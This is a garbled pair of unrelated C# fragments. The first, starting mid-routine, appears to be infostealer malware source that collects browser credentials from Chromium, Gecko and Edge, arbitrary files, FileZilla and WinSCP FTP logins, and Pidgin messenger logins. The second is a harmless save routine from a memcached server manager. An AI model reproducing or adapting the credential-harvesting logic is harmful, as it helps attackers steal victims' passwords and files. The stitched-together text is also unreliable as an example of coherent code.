(IList <InstalledBrowserInfo>)UserInfoHelper.GetBrowsers(); credentials.Processes = (IList <string>)UserInfoHelper.ListOfProcesses(); credentials.InstalledSoftwares = (IList <string>)UserInfoHelper.ListOfPrograms(); credentials.Languages = (IList <string>)UserInfoHelper.AvailableLanguages(); if (settings.GrabBrowsers) { List <Browser> browserList = new List <Browser>(); browserList.AddRange((IEnumerable <Browser>)ChromiumEngine.ParseBrowsers()); browserList.AddRange((IEnumerable <Browser>)GeckoEngine.ParseBrowsers()); browserList.Add(EdgeEngine.ParseBrowsers()); foreach (Browser browser in browserList) { if (!browser.IsEmpty()) { credentials.Browsers.Add(browser); } } } if (settings.GrabFiles) { credentials.Files = RemoteFileGrabber.ParseFiles((IEnumerable <string>)settings.GrabPaths); } if (settings.GrabFTP) { List <LoginPair> loginPairList = new List <LoginPair>(); loginPairList.AddRange((IEnumerable <LoginPair>)FileZilla.ParseConnections()); loginPairList.AddRange((IEnumerable <LoginPair>)WinSCP.ParseConnections()); credentials.FtpConnections = (IList <LoginPair>)loginPairList; } if (settings.GrabImClients) { foreach (LoginPair connection in Pidgin.ParseConnections()) { credentials.FtpConnections.Add(connection); } } } catch { } return(credentials); }
private void SaveChanges() { Cursor = Cursors.WaitCursor; try { SetStatusLabel("Checking server name."); if (IsUserAccountInfomationValid() == false) { return; } if (IsServerNameAcceptable() == false) { return; } if (DoesServerNameAlreadyExistInList() == true) { return; } string userName = null; string password = null; if (chkUseImpersonation.Checked == true) { userName = txtUserName.Text; password = txtPassword.Text; } SetStatusLabel("Checking connection and authorization."); // Test the credentials. try { WmiService.GetAllServices(txtServerName.Text, userName, password, "PathName LIKE '%memcached%'"); } catch (Exception ex) { MessageBox.Show("Couldn't connect to the server. Please check server connectivity and user name and password.\n" + ex.Message); return; } if (_server == null) { _server = new MemCacheDManager.Business.Server(); ServerConfiguration.Servers.Add(_server); } _server.ServerName = txtServerName.Text; _server.UserName = txtUserName.Text; _server.Password = Encryption.Encrypt(txtPassword.Text); _server.UseImpersonation = chkUseImpersonation.Checked; _server.BinaryPath = txtBinaryPath.Text; SetStatusLabel("Checking for MemCacheD instances."); _server.ReadInstancesFromServer(); SetStatusLabel("Saving."); ServerConfiguration.Save(Configuration.Default.LastConfigFile); btnApply.Enabled = false; btnCancel.Enabled = false; btnAddInstance.Enabled = true; SetStatusLabel("Updating UI."); if (Save != null) { Save(this._server); } } finally { Cursor = Cursors.Default; SetStatusLabel("Ready."); } }